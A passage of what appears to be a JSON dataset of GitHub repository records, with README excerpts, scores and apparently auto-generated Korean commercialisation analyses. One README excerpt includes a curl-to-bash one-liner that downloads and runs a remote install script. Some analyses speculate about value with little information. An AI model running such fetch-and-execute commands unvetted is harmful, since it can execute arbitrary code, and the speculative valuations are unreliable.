💼\n\n![Canadian-Tech-Internships-Summer-2025.png](https://github.com/user-attachments/assets/d632dd69-0347-4573-8b58-fc42b4da3f10)\n![Canadian-Tech-Internships-Summer-2025-Image-2.png](https://github.com/user-attachments/assets/2c42cdd5-fc2d-41c5-a92e-d807e7116fa5)\n\nCrowdsourced list of Canadian tech companies that are hiring Interns and Full Time New Grads for 2025 that are interested in tech, SWE, and related fields. Never too early to get started in your search! Thanks to [elaine-zheng](https://github.com/elaine-zheng/summer2020internships) who made a similar document for the US for formatting inspiration.\n\nTo contribute:\n\n1.  Fork repository\n2.  Edit README.md\n3.  Open a pull request!\n\n> 💡 Want more help? Check out the `CONTRIBUTING.md` document for more information on how to contribute\n\n# 🎉 2025 Internship Applications\n\n<img width=\"761\" alt=\"Intern Positions\" src=\"https://github.com/user-attachments/assets/aff1baa0-bc49-48a6-b9be-75ab7bc2","composite_score":0.3626,"license_safety_tag":"unknown"},{"name":"abel533/MyBatis-Spring-Boot","github_url":"https://github.com/abel533/MyBatis-Spring-Boot","stars":5,"language":"Java","license":"unknown","abandonment_months":53,"description":"# MyBatis-Spring-Boot 저장소 분석\n\n## 왜 보물인가\n자바로 만든 웹 애플리케이션에서 데이터베이스를 쉽게 다루도록 도와주는 도구 모음입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소 기업의 클라우드 기반 업무 관리 플랫폼에 내장하여 고객 데이터를 안정적으로 관리\n- **내부 업무 도구**: 대기업의 사원 정보, 급여, ","readme_excerpt":"# Spring Boot 集成 MyBatis, 分页插件 PageHelper, 通用 Mapper \n\n- [Spring Boot 1.5.1.RELEASE](https://github.com/spring-projects/spring-boot)\n- [mybatis-spring-boot-starter](https://github.com/mybatis/spring-boot-starter)\n- [mapper-spring-boot-starter](https://github.com/abel533/mapper-boot-starter)\n- [pagehelper-spring-boot-starter](https://github.com/pagehelper/pagehelper-spring-boot)\n\n## 新书《MyBatis 从入门到精通》\n\n![MyBatis 从入门到精通](https://github.com/mybatis-book/book/raw/master/book.png)\n\n预售地址：[京东](https://item.jd.com/12103309.html)，[当当](http://product.dangdang.com/25098208.html)，[亚马逊](https://www.amazon.cn/MyBatis从入门到精通-刘增辉/dp/B072RC11DM/ref=sr_1_18?ie=UTF8&qid=1498007125&sr=8-18&keywords=mybatis)\n\nCSDN博客：http://blog.csdn.net/isea533/article/details/73555400\n\nGitHub项目：https://github.com/mybatis-book/book\n\n## 项目依赖\n```xml\n<!--mybatis-->\n<dependency>\n    <groupId>org.mybatis.spring.boot</groupId>\n    <artifactId>mybatis-spring-boot-starter</artifactId>\n    <version>1.3.1</version>\n</dependency>\n<!--","composite_score":0.3626,"license_safety_tag":"unknown"},{"name":"antoniolg/androidmvp","github_url":"https://github.com/antoniolg/androidmvp","stars":5,"language":"Java","license":"unknown","abandonment_months":36,"description":"# antoniolg/androidmvp 분석\n\n## 왜 보물인가\n안드로이드 앱 개발의 가장 효율적인 구조를 미리 설계해놓은 템플릿으로, 초기 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **안드로이드 앱 개발 교육 플랫폼**: 개발 학원이나 온라인 강의 사이트에서 학생들에게 정석적인 개발 방식을 가르치는 교재로 활용\n2. **앱","readme_excerpt":"androidmvp\n==========\n\nMVP Android Example used to explain how to use this pattern in our Android apps. This code was created to support an article explanation:\n\n[Android MVP @ antonioleiva.com (English)](http://antonioleiva.com/mvp-android)\n\n[![Android Arsenal](https://img.shields.io/badge/Android%20Arsenal-androidmvp-brightgreen.svg?style=flat)](https://android-arsenal.com/details/3/1514)\n","composite_score":0.3623,"license_safety_tag":"unknown"},{"name":"ElemeFE/node-interview","github_url":"https://github.com/ElemeFE/node-interview","stars":12,"language":"HTML","license":"mit","abandonment_months":68,"description":"# node-interview 분석 보고서\n\n## 왜 보물인가\n면접을 준비하는 개발자들이 필요한 핵심 지식을 한곳에서 학습하고 정리할 수 있는 실용적인 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 온보딩 플랫폼**: 신입 개발자 교육용 구독 서비스로 제공\n2. **IT 취업 준비 앱**: 면접 예상 문제 풀이와 해설을 담은 유료 모바일 앱\n","readme_excerpt":"![ElemeFE-background](assets/ElemeFE-background.png)\n\n# Node interview of ElemeFE\n\n* ## What's this?\n\nWe were looking for senior backend developer with Node.js. And, this repo is the interview catalog (not just questions & answers) about it, and it shows you how to pass the Node.js interview of [ElemeFE](https://github.com/ElemeFE/).\n\n* ## Motivation\n\nWe had a lot of interviews about Node.js & full-stack in 2016. We found there are many developers came from frontend, and most of them had leaky knowledge of backend system. Thus we found it's difficult to got senior Node.js developer about backend (not full-stack).\n\nDue to our consistent of open source and sharing spirit, we prepared this Node.js advanced tutorial which called \"node-interview\".\n\n* ## Start Reading\n  * [English Entry](sections/en-us/)\n  * [简体中文入口](sections/zh-cn/)\n\n> The content is translated from chinese, We'd say sorry that the translation is just started, you may not able to read it completely. BTW, it is welcome to he","composite_score":0.3622,"license_safety_tag":"safe"},{"name":"soulbliss/NLP-conference-compendium","github_url":"https://github.com/soulbliss/NLP-conference-compendium","stars":10,"language":"","license":"unknown","abandonment_months":27,"description":"","readme_excerpt":"The compendium is created with an objective to **organise all the latest research carried in the direction of NLP**, so that interested researchers, students can **head directly to papers that matter** rather than sauntering through the conference website and face information overload.  \n\n## Thanks to our sponsors\n[Product description generator by Cookie writer](https://cookiewriter.com/writing-tools/product-description-generator) uses AI and NLP to write amazing catchy descriptions for your product.\n\n\n# [NLP top 10 conferences Compendium](https://deeps.site/blog/2019/08/31/nlp-conference-compendium/)\n\n1. [ACL: Association for Computational Linguistics](http://www.aclweb.org/)\n2. [EMNLP: Empirical Methods in Natural Language Processing](http://hum.csse.unimelb.edu.au/emnlp2013/)\n3. [NAACL: North American Chapter of the Association for Computational Linguistics](http://naacl.org/)\n4. [EACL: European Chapter of the Association for Computational Linguistics](http://www.eacl.org/)\n5. [COLI","composite_score":0.3621,"license_safety_tag":"unknown"},{"name":"pujiaxin33/StackUI","github_url":"https://github.com/pujiaxin33/StackUI","stars":5,"language":"Swift","license":"MIT","abandonment_months":18,"description":"# StackUI 상용화 분석\n\n## 왜 보물인가\n웹사이트나 앱을 만들 때 필요한 UI 컴포넌트(버튼, 입력창 등)를 미리 만들어둔 것으로, 개발 시간을 크게 단축할 수 있는 재사용 가능한 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n프로젝트 관리, 고객 관리, 분석 대시보드 등 기업용 웹 서비스를 빠르게 출시할 때 UI 컴포넌트 ","readme_excerpt":"# StackUI\n\n[中文文档](https://github.com/pujiaxin33/StackUI/blob/main/README-CN.md)\n\nUse `UIStackView` like `SwiftUI`.\n\nUse `@propertyWrapper`, `@resultBuilder`, chain syntax and other features used by `SwiftUI`, making `UIStackView` easy to use. For classes such as `Label`, `Button`, and `ImageView`, it is still the way to use UIKit, but it is encapsulated with chain syntax.\n\nBecause `SwiftUI` requires an iOS13+ system to be used, it is almost impossible to use `SwiftUI` in actual projects. But the features of `SwiftUI` are really fascinating, so `StackUI` is the implementation of `SwiftUI` in the scope of `UIStackView`. You can experience some of the features of `SwiftUI` in `StackUI`, so that you can learn the new features earlier.\n\nIf you are tired of configuring the constraints of UIKit, then `StackUI` will be a good helper for you. The declarative layout make world better.\n\n# Features\n\n- [x] Declarative syntax similar to `SwiftUI`;\n- [x] Data-driven UI, update data then UI automatica","composite_score":0.3619,"license_safety_tag":"safe"},{"name":"laraform/laraform","github_url":"https://github.com/laraform/laraform","stars":9,"language":"SCSS","license":"NOASSERTION","abandonment_months":55,"description":"","readme_excerpt":"<div align=\"center\">\n\n<a href=\"https://laraform.io\"><img src=\"assets/logo.svg\" style=\"margin: 20px auto 10px\" width=\"220\"></a>\n\nDynamic Form Builder for Laravel with Vue.js\n\nCreate even the most complex forms with ease, using two-sided validation, <br> eloquent, nested elements, conditional logic, wizards and many more.\n\n<a href=\"https://laraform.io\"><img src=\"screenshots/screencast-1.gif\" style=\"margin: 24px auto 24px\" width=\"540\"></a>\n\n</div>\n\n# Laraform Community Edition (Vue.js)\n\nLaraform is a premium library aiming to become the world's best form builder tool for web developers. It enhances collaboration by standardizing the creation of forms and increases efficiency by eliminating tons of repetitive work. Laraform comes with a lighter \"Community Edition\" and a full version which can be purchased at our [website](https://laraform.io/pricing).\n\n## Features\n\nFull features of Laraform:\n\n* Two-sided validation\n* 54 Laravel compatible frontend validators\n* Eloquent ORM support\n* Multip","composite_score":0.3618,"license_safety_tag":"unknown"},{"name":"apachecn/hands_on_Ml_with_Sklearn_and_TF","github_url":"https://github.com/apachecn/hands_on_Ml_with_Sklearn_and_TF","stars":12,"language":"CSS","license":"unknown","abandonment_months":58,"description":"# 저장소 분석: hands_on_Ml_with_Sklearn_and_TF\n\n## 왜 보물인가\n복잡한 인공지능 기술을 실제 코드로 배울 수 있는 실습 교재로, 입문자부터 전문가까지 단계별로 학습할 수 있는 완성된 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 교육 플랫폼**: 영상 강의와 함께 이 자료를 제공하여 학생들이 직접 따라하며 배울","readme_excerpt":"# Sklearn 与 TensorFlow 机器学习实用指南第二版\n\n![](cover.jpg)\n\n> 协议：[CC BY-NC-SA 4.0](http://creativecommons.org/licenses/by-nc-sa/4.0/)\n> \n> 懦夫才用磁带备份，真男人把重要的东西传到 FTP，然后世界会帮他备份。——林纳斯·托瓦兹\n\n* [在线阅读](https://hands1ml.apachecn.org/)\n* [ApacheCN 面试求职交流群 724187166](https://jq.qq.com/?_wv=1027&k=54ujcL3)\n* [ApacheCN 学习资源](http://www.apachecn.org/)\n* [利用 Python 进行数据分析 第二版](https://github.com/apachecn/pyda-2e-zh)\n\n## 编译\n\n```\nnpm install -g gitbook-cli          # 安装 gitbook\ngitbook fetch 3.2.3                 # 安装 gitbook 子版本\ngitbook install                     # 安装必要的插件\ngitbook <build|pdf|epub|mobi>       # 编译 HTML/PDF/EPUB/MOBI\n```\n\n\n## 下载\n\n### Docker\n\n```\ndocker pull apachecn0/hands-on-ml-2e-zh\ndocker run -tid -p <port>:80 apachecn0/hands-on-ml-2e-zh\n# 访问 http://localhost:{port} 查看文档\n```\n\n### PYPI\n\n```\npip install hands-on-ml-2e-zh\nhands-on-ml-2e-zh <port>\n# 访问 http://localhost:{port} 查看文档\n```\n\n### NPM\n\n```\nnpm install -g handson-ml-2e-zh\nhandson-ml-2e-zh <port>\n# 访问 http://localhost:{port} 查看文档\n```\n","composite_score":0.3614,"license_safety_tag":"unknown"},{"name":"umicro/uView2.0","github_url":"https://github.com/umicro/uView2.0","stars":10,"language":"Vue","license":"MIT","abandonment_months":17,"description":"# umicro/uView2.0 분석\n\n## 왜 보물인가\n모바일 앱 개발자들이 자주 쓰는 UI 디자인 모음집으로, 이를 활용하면 앱 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 모바일 앱 개발 플랫폼에 이 UI 템플릿을 내장하여 사용자가 빠르게 앱을 만들 수 있게 지원\n2. **내부 업무 도구**: 회사 ","readme_excerpt":"<p align=\"center\">\n    <img alt=\"logo\" src=\"https://uviewui.com/common/logo.png\" width=\"120\" height=\"120\" style=\"margin-bottom: 10px;\">\n</p>\n<h3 align=\"center\" style=\"margin: 30px 0 30px;font-weight: bold;font-size:40px;\">uView 2.0</h3>\n<h3 align=\"center\">多平台快速开发的UI框架</h3>\n\n[![stars](https://img.shields.io/github/stars/umicro/uView2.0?style=flat-square&logo=GitHub)](https://github.com/umicro/uView2.0)\n[![forks](https://img.shields.io/github/forks/umicro/uView2.0?style=flat-square&logo=GitHub)](https://github.com/umicro/uView2.0)\n[![issues](https://img.shields.io/github/issues/umicro/uView2.0?style=flat-square&logo=GitHub)](https://github.com/umicro/uView2.0/issues)\n[![Website](https://img.shields.io/badge/uView-up-blue?style=flat-square)](https://uviewui.com)\n[![release](https://img.shields.io/github/v/release/umicro/uView2.0?style=flat-square)](https://gitee.com/umicro/uView2.0/releases)\n[![license](https://img.shields.io/github/license/umicro/uView2.0?style=flat-square)](https://en.w","composite_score":0.3614,"license_safety_tag":"safe"},{"name":"saic-mdal/lama","github_url":"https://github.com/saic-mdal/lama","stars":16,"language":"Jupyter Notebook","license":"Apache-2.0","abandonment_months":16,"description":"# SAIC-MDAL/LaMa 저장소 분석\n\n## 왜 보물인가\n사진이나 이미지에서 원치 않는 물체를 자동으로 제거하고 깔끔하게 복구해주는 AI 기술로, 사진 편집 앱이나 온라인 서비스에 바로 적용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **사진 편집 SaaS**: 사용자가 휴대폰 앱에서 사진 속 사람·물체를 제거하면 자동으로 배경을 채워주는 구독 ","readme_excerpt":"# 🦙 LaMa: Resolution-robust Large Mask Inpainting with Fourier Convolutions\n\nby Roman Suvorov, Elizaveta Logacheva, Anton Mashikhin, \nAnastasia Remizova, Arsenii Ashukha, Aleksei Silvestrov, Naejin Kong, Harshith Goka, Kiwoong Park, Victor Lempitsky.\n\n<p align=\"center\" \"font-size:30px;\">\n  🔥🔥🔥\n  <br>\n  <b>\nLaMa generalizes surprisingly well to much higher resolutions (~2k❗️) than it saw during training (256x256), and achieves the excellent performance even in challenging scenarios, e.g. completion of periodic structures.</b>\n</p>\n\n[[Project page](https://advimman.github.io/lama-project/)] [[arXiv](https://arxiv.org/abs/2109.07161)] [[Supplementary](https://ashukha.com/projects/lama_21/lama_supmat_2021.pdf)] [[BibTeX](https://senya-ashukha.github.io/projects/lama_21/paper.txt)] [[Casual GAN Papers Summary](https://www.casualganpapers.com/large-masks-fourier-convolutions-inpainting/LaMa-explained.html)]\n \n<p align=\"center\">\n  <a href=\"https://colab.research.google.com/drive/15KTEIScUbVZt","composite_score":0.361,"license_safety_tag":"safe"},{"name":"instructlab/taxonomy","github_url":"https://github.com/instructlab/taxonomy","stars":297,"language":"Python","license":"Apache-2.0","abandonment_months":9,"description":"","readme_excerpt":"","composite_score":0.361,"license_safety_tag":"safe"},{"name":"filsv/iPhoneOSDeviceSupport","github_url":"https://github.com/filsv/iPhoneOSDeviceSupport","stars":5,"language":"Shell","license":"unknown","abandonment_months":16,"description":"# iPhoneOSDeviceSupport 저장소 분석\n\n## 왜 보물인가\niPhone과 iPad 앱을 만드는 개발자들이 반드시 필요로 하는 기기 정보 데이터베이스로, 새로운 iOS 버전 출시 시마다 높은 수요가 발생합니다.\n\n## 어디에 쓸 수 있나\n1. **앱 개발 도구 SaaS**: 개발자들이 구독하는 IDE나 빌드 도구에서 최신 iPhone 호환성 ","readme_excerpt":"# iPhoneOSDeviceSupport\nXcode iPhoneOS DeviceSupport (6.0 - 17.0)\n[[WatchOS](https://github.com/filsv/watchOSDeviceSupport) | [tvOS](https://github.com/filsv/TVOSDeviceSupport)];\n\n> [!NOTE]\n**Bonus Tip: Free Up Disk Space from Xcode Caches using**\n> **[Clean My Xcode](https://github.com/filsv/clean-my-xcode)**\n\n> [!NOTE]\n> ![NEW](https://img.shields.io/badge/NEW-red?style=flat)\n> Easily install iOS Device Support files for Xcode using this terminal script:\n```bash\nbash <(curl -s https://raw.githubusercontent.com/filsv/iOSDeviceSupport/master/scripts/install_device_support.sh)\n```\n> Steps:\n> 1.\tCopy and paste the command into your terminal and press Enter.\n> 2.\tEnter the desired iOS version (e.g., 16.6) when prompted.\n> 3.\tEnter your macOS password when asked (required to copy files into Xcode’s system directory).\n> 4.\tSit back and let the script handle everything for you!\n>\n</br>\n\n> [!WARNING]\n> [<strong>iOS 17+ Workaround (Xcode 14+ required):</strong><br>](#ios17workaround)\n> In the ","composite_score":0.3609,"license_safety_tag":"unknown"},{"name":"julianshapiro/velocity","github_url":"https://github.com/julianshapiro/velocity","stars":6,"language":"JavaScript","license":"mit","abandonment_months":68,"description":"# Velocity 저장소 분석\n\n## 왜 보물인가\n웹페이지의 부드러운 애니메이션 효과를 간단하게 만들어주는 도구로, 사용자 경험을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 대시보드나 관리 페이지에서 데이터 전환 시 부드러운 숫자 변경 애니메이션 제공\n2. **내부 업무 도구**: 회사 시스템에서 통계 수치나 진","readme_excerpt":"﻿# Velocity beta\n\n[![npm](https://img.shields.io/npm/v/velocity-animate.svg)](https://www.npmjs.com/package/velocity-animate) [![npm (tag)](https://img.shields.io/npm/v/velocity-animate/beta.svg)](https://www.npmjs.com/package/velocity-animate) [![cdnjs version](https://img.shields.io/cdnjs/v/velocity.svg)](https://cdnjs.com/libraries/velocity) [![npm downloads](https://img.shields.io/npm/dm/velocity-animate.svg)](https://www.npmjs.com/package/velocity-animate) [![jsdelivr downloads](https://data.jsdelivr.com/v1/package/npm/velocity-animate/badge)](https://www.jsdelivr.com/package/npm/velocity-animate)\n\n## NPM: `npm install velocity-animate@beta`\n\n## Docs\n[https://github.com/julianshapiro/velocity/wiki](https://github.com/julianshapiro/velocity/wiki)\n\n# IMPORTANT: The velocityjs.org documentation refers to V1, not V2 beta - use the wiki for latest documentation!\n\n## News\nWhatsApp, Tumblr, Windows, Samsung, Uber, and thousands of other companies rely on Velocity. Visit [Libscore.com](ht","composite_score":0.3608,"license_safety_tag":"safe"},{"name":"MalwareArchaeology/ARTHIR","github_url":"https://github.com/MalwareArchaeology/ARTHIR","stars":9,"language":"PowerShell","license":"Apache-2.0","abandonment_months":18,"description":"# ARTHIR 저장소 분석 보고서\n\n## 왜 보물인가\n악성코드를 탐지하고 분석하기 위한 오픈소스 도구로, 사이버보안 전문가들이 컴퓨터 침해 사건을 조사할 때 필수적으로 사용할 수 있는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **보안 모니터링 SaaS**: 기업의 컴퓨터를 24시간 감시하여 악성코드 감염 여부를 자동으로 탐지하는 클라우드 서비스\n2. ","readme_excerpt":"# ARTHIR\nATT&amp;CK Remote Threat Hunting Incident Response\n\nVERSION\n-------\nInitial release ver 1.0 - Mar 2019\n\nBACKGROUND\n----------\nWHAT IS ARTHIR?\n\nATT&CK Remote Threat Hunting Incident Response (ARTHIR) is an update to the popular KANSA framework. ARTHIR works differently than KANSA in that you can create output with your ARTHIR module and then the results are pulled back to the launching host. KANSA only pulled console output back which limited its capabilities. KANSA was unable to execute binary utilities and tools such as LOGMD remotely and pull reports back. ARTHIR can run scripts as KANSA does, but also binary utilities and\ntools, making ARTHIR much more flexible than KANSA.\n\nKANSA is a modular incident response framework in Powershell to remotely run various PowerShell commands on a remote system to investigate a suspect system. The KANSA project is no longer maintained by the creator Dave Hull, but is still used and updated by some users. \n\nARTHIR was created to provide a s","composite_score":0.3607,"license_safety_tag":"safe"},{"name":"deeplearning-ai/machine-learning-yearning-cn","github_url":"https://github.com/deeplearning-ai/machine-learning-yearning-cn","stars":5,"language":"CSS","license":"NOASSERTION","abandonment_months":44,"description":"# Machine Learning Yearning CN 분석\n\n## 왜 보물인가\n인공지능을 배우고 싶어 하는 비전공자들을 위해 복잡한 개념을 쉽게 설명해주는 교과서 같은 자료입니다.\n\n## 어디에 쓸 수 있나\n\n1. **AI 온라인 교육 플랫폼**: 인공지능 입문 강좌의 교재 및 학습 자료로 제공하는 구독형 교육 서비스\n2. **기업 직원 교육용 도구**:","readme_excerpt":"# Machine Learning Yearning 中文版\n\n[访问此处](https://deeplearning-ai.github.io/machine-learning-yearning-cn/) 开始在线阅读《机器学习训练秘籍》样稿，希望这本书对你们有所帮助！当前样稿仅供内容预览，非最终版本（历史版本可以在 [release](https://github.com/deeplearning-ai/machine-learning-yearning-cn/releases) 中找到）。\n\n## 合作改善翻译质量\n\n译者水平有限，如有翻译不当之处，恳请读者帮助斧正，途径为：\n\n1. 在项目的 Issues 区创建新的讨论内容；（推荐）\n2. 在网页点击 “改进当前页面”，修改后发起 Pull Request；\n3. [发送邮件](mailto:xiaowei@deeplearning.ai) 进行反馈，主题带有 “MLY 翻译”。\n\n注：所有图片放在 `img` 路径下，本地无法预览，在文稿中的插入方式为：\n```\n <img src=\"{{\"pic_name.jpg \" | prepend: site.imgurl }}\">\n```\n\n## 相关版权声明\n\n本项目遵循 “署名-非商业性使用-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0)” 协议。这是一份普通人可以理解的[许可协议](https://creativecommons.org/licenses/by-nc-sa/4.0/legalcode.zh-Hans)概要 (但不是替代) 。 [免责声明](https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh#).\n\n您可以自由地：\n\n- **共享** — 在任何媒介以任何形式复制、发行本作品\n- **演绎** — 修改、转换或以本作品为基础进行创作\n\n只要你遵守许可协议条款，许可人就无法收回你的这些权利。\n惟须遵守下列条件：\n\n- **署名** — 您必须给出[适当的署名](https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh#)，提供指向本许可协议的链接，同时[标明是否（对原始作品）作了修改](https://cr","composite_score":0.3605,"license_safety_tag":"unknown"},{"name":"storeon/storeon","github_url":"https://github.com/storeon/storeon","stars":7,"language":"JavaScript","license":"MIT","abandonment_months":18,"description":"# Storeon 저장소 분석\n\n## 왜 보물인가\n작고 가벼우면서도 웹 애플리케이션의 데이터를 효율적으로 관리할 수 있는 도구로, 복잡한 설정 없이 바로 사용할 수 있다는 점이 핵심입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 사용자 설정 정보, 장바구니 데이터, 앱 상태 저장이 필요한 웹 서비스\n- **내부 업무 도구**: 팀 협업 플랫","readme_excerpt":"# Storeon\n\n*Deprecated in favor of [Nano Stores](https://github.com/nanostores/nanostores).*\n\n<img src=\"https://storeon.github.io/storeon/logo.svg\" align=\"right\"\n     alt=\"Storeon logo by Anton Lovchikov\" width=\"160\" height=\"142\">\n\nA tiny event-based Redux-like state manager for **React**, **Preact**,\n**[Angular]**, **[Vue]** and **[Svelte]**.\n\n* **Small.** 180 bytes (minified and gzipped). No dependencies.\n  It uses [Size Limit] to control size.\n* **Fast.** It tracks what parts of state were changed and re-renders\n  only components based on the changes.\n* **Hooks.** The same Redux reducers.\n* **Modular.** API created to move business logic away from React components.\n\nRead more about Storeon features in **[our article]**.\n\n```js\nimport { createStoreon } from 'storeon'\n\n// Initial state, reducers and business logic are packed in independent modules\nlet count = store => {\n  // Initial state\n  store.on('@init', () => ({ count: 0 }))\n  // Reducers returns only changed part of the state\n  ","composite_score":0.3604,"license_safety_tag":"safe"},{"name":"gsdios/SDCycleScrollView","github_url":"https://github.com/gsdios/SDCycleScrollView","stars":11,"language":"Objective-C","license":"mit","abandonment_months":38,"description":"# SDCycleScrollView 분석 보고서\n\n## 왜 보물인가\n스마트폰 앱에서 자동으로 넘어가는 이미지 배너를 쉽게 만들 수 있는 도구로, iOS 앱 개발자들의 반복적인 작업을 크게 줄여줍니다.\n\n## 어디에 쓸 수 있나\n1. **전자상거래 앱 SaaS**: 쇼핑몰 앱 제작 플랫폼에서 상품 홍보 배너 기능을 기본으로 제공\n2. **내부 업무 도구**:","readme_excerpt":"# SDCycleScrollView（新建QQ交流群：185534916、675995250）\n## ☆☆☆ “iOS图片、文字轮播器” ☆☆☆\n\n### 字节跳动 iOS 岗位招聘\n北上广深杭大量招人，各种研发岗位都在找，有意向者可以直接点击后面链接投递简历或者联系我 gsdios@126.com https://job.toutiao.com/s/eL91QMm，\n\n### 支持pod导入\npod 'SDCycleScrollView','>= 1.82'\n\n\n### 更改记录：\n\n2020.10.31 -- 修复iOS14上系统自带pagecontrol显示不出来bug （已发布到1.82版本）\n\n2019.04.10 -- 适配SDWebImage 5.0.0\n\n2017.11.26 -- 增加滚动到指定index接口\n\n2017.10.28 -- 更新对SDWebImage的版本依赖\n\n2017.06.23 -- 1.增加支持轮播自定义cell的代理方法 2.增加禁止拖动手势api\n\n2016.05.27 -- 新增纯文字轮播、增加viewController在来回push时候出现的图片卡在中间的解决方案“解决viewWillAppear时出现时轮播图卡在一半的问题，在控制器viewWillAppear时调用 adjustWhenControllerViewWillAppera”\n\n2016.04.21 -- 修复自定义图片的pagecontrol刷新图片数据时崩溃bug；设置单张图片时停止轮播\n\n2016.03.31 -- 增加垂直方向滚动功能\n\n2016.01.21 -- 修复加载时出现item size zero提示问题\n\n2016.01.15 -- 兼容assets存放的本地图片\n\n2016.01.06 -- 0.图片管理使用SDWebImage；1.优化内存，提升性能；2.添加图片contentmode接口；3.block监听点击接口；4.滚动到某张图片监听；5.增加自定义图片pageControl接口；6.其他等等。其中有一处接口改动：pagecontrol的小圆点自定义接口改为：currentPageDotColor、pageDotColor、currentPageDotImage、pageDotImage。\n\n           \n##","composite_score":0.3601,"license_safety_tag":"safe"},{"name":"981011512/--","github_url":"https://github.com/981011512/--","stars":76,"language":"Java","license":"unknown","abandonment_months":13,"description":"# 저장소 분석: 981011512/--\n\n## 왜 보물인가\n정확한 저장소 정보가 불충분하여 구체적인 가치 평가가 어렵지만, 76개의 별(추천)을 받은 점으로 보아 개발자 커뮤니티에서 실제 필요를 충족하는 솔루션으로 인정받고 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 저장소의 기능을 웹 기반 구독 서비스로 변환하여 월정액 사용자 모델","readme_excerpt":"停车场管理_充电桩_停车收费_物业管理_物联网_自助缴费 （最新版本：2025年04月12日发布，几乎每天都更新）\n\n以后最新版本代码只在更新国内地址了，后续github暂时不更新了（ https://gitee.com/next-door-xiaoma-xian/cfzh_java_pb_v2 ）\n\n【严正声明】： 本项目基础代码完整，喜欢的个人爱好者自行克隆代码，项目能跑起来，在此基础框架开发至少能省你6-12个月时间，此项目为商业代码，项目代码已经完全开放，请勿混淆，感谢理解和支持，在不影响原来收费客户前提下开源\n\n【声明】：本项目里面的代码没有任何私jar包，本来就是开源项目，代码没有丢包或者故意丢代码导致项目报错的情况，但是不保证能商用，个人拿来作为入门研究和快速二次开发是个不错的选择，想要商用的建议自己进行二次开发。这项目代码肯定能跑起来，基础太差的小白，自己先去学习学习java基础和springboot基础！\n\n【商业合作】：如果你自己运行和或者二次开发本系统有压力，或者不想花太多精力，也可以联系作者我个人，微信:Dove981011512,单次收费1万起步，开源代码已经是全代码的，如非必要请勿加，感谢您的海涵，再次跟您说声抱歉和感谢。\n\n详细在线介绍和部署文档,测试地址【推荐仔细查阅】:\n\n【V3.0】: https://www.showdoc.com.cn/cfzhv3/10115551424871318 搭建教程文档\n\n【开发建议】：想研究相机对接的，建议自己买个开发机器，连个两三百的开发机器你都没有，不要谈啥研究车牌识别系统。先声明，我自己不是推销产品啥的，根据个人需求，需要购买的自己去某宝购买，\n\n【前端小程序开源地址】(3.0)：[https://gitee.com/cfzhv3/cfzhvmin3.0](https://gitee.com/next-door-xiaoma-xian/min-public)\n\n【后台管理开源地址】(3.0)：[https://gitee.com/cfzhv3/cfzhv3.0_public_admin](https://gitee.com/next-door-xiaoma-xian/admin-public)\n\n【岗亭端开源地址】(3.0)：[https://gitee.com/cfzhv3/cfzhv3-","composite_score":0.36,"license_safety_tag":"unknown"},{"name":"crazycodeboy/TakePhoto","github_url":"https://github.com/crazycodeboy/TakePhoto","stars":6,"language":"Java","license":"apache-2.0","abandonment_months":82,"description":"# TakePhoto 저장소 분석\n\n## 왜 보물인가\n스마트폰으로 사진을 찍을 때 필요한 기능들을 한 번에 제공하는 도구로, 앱 개발자들이 직접 만들 필요 없이 바로 가져다 쓸 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **소셜 미디어 앱 개발사**: 사용자가 피드에 올릴 사진을 쉽게 찍고 편집할 수 있는 기능 제공\n2. **부동산 중개 플랫폼**: 중","readme_excerpt":"## [TakePhoto](https://github.com/crazycodeboy/TakePhoto) 简介\n\n[![PRs Welcome](https://img.shields.io/badge/PRs-Welcome-brightgreen.svg)](https://github.com/crazycodeboy/TakePhoto/pulls)\n[![Download](https://api.bintray.com/packages/crazycodeboy/maven/TakePhoto/images/download.svg) ](https://bintray.com/crazycodeboy/maven/TakePhoto/_latestVersion)\n[![GitHub release](https://img.shields.io/github/release/crazycodeboy/TakePhoto.svg?maxAge=2592000?style=flat-square)](https://github.com/crazycodeboy/TakePhoto/releases)\n[![License Apache2.0](http://img.shields.io/badge/license-Apache2.0-brightgreen.svg?style=flat)](https://raw.githubusercontent.com/crazycodeboy/TakePhoto/master/LICENSE)\n\n\n\n`TakePhoto`是一款用于在Android设备上获取照片（拍照或从相册、文件中选择）、裁剪图片、压缩图片的开源工具库，目前最新版本[4.1.0](https://github.com/crazycodeboy/TakePhoto/)。\n3.0以下版本及API说明，详见[TakePhoto2.0+](https://github.com/crazycodeboy/TakePhoto/blob/master/README.2+.md)。  \n\n>TakePhoto交流平台：QQ群：556387607（群1，未满）\n\n**V4.0**\n\n- 支持通过相机拍照获取图片\n- 支持从相册选择图片\n- 支持从文件选","composite_score":0.36,"license_safety_tag":"safe"},{"name":"deep-learning-with-pytorch/dlwpt-code","github_url":"https://github.com/deep-learning-with-pytorch/dlwpt-code","stars":10,"language":"Jupyter Notebook","license":"unknown","abandonment_months":22,"description":"","readme_excerpt":"# Deep Learning with PyTorch\n\nThis repository contains code for the book Deep Learning with PyTorch by Eli Stevens, Luca Antiga, and Thomas Viehmann, published by Manning Publications.\n\n![Image of the cover for Deep Learning with PyTorch](data/Stevens-DLPy-HI.png)\n\nThe Manning site for the book is: https://www.manning.com/books/deep-learning-with-pytorch\n\nThe book can also be purchased on Amazon: https://amzn.to/38Iwrff (affiliate link; as per the rules: \"As an Amazon Associate I earn from qualifying purchases.\")\n\nThe errata for the book can be found on the manning website, or at https://deep-learning-with-pytorch.github.io/dlwpt-code/errata.html\n\n## About Deep Learning with PyTorch\n\nThis book has the aim of providing the foundations of deep learning with PyTorch and\nshowing them in action in a real-life project. We strive to provide the key concepts underlying deep learning and 